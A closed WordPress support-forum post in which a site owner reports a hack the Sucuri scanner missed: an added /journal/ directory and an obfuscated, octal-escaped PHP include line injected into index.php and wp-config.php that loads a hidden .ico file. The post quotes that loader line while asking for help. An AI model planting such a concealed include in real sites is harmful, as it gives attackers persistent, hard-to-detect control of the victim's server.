My sucuri says “All Core WordPress Files Are Correct” but I found somehow hacker added a directory called /journal/ to the installation and also added the following code to the top of index.php and wp-config.php:
/*0d5c6*/ @include "\057home\057mysitename\160ubli\143_htm\154/wp-\151nclu\144es/j\163/jqu\145ry/.\14583d0\06246.i\143o"; /*0d5c6*/
I decoded it and deleted the file from wp-includes/js/jquery/.e83d0246.ico
But why does Sucuri not understand these files are changed?
- The topic ‘I see hacked code but Sucuri says files are all OK’ is closed to new replies.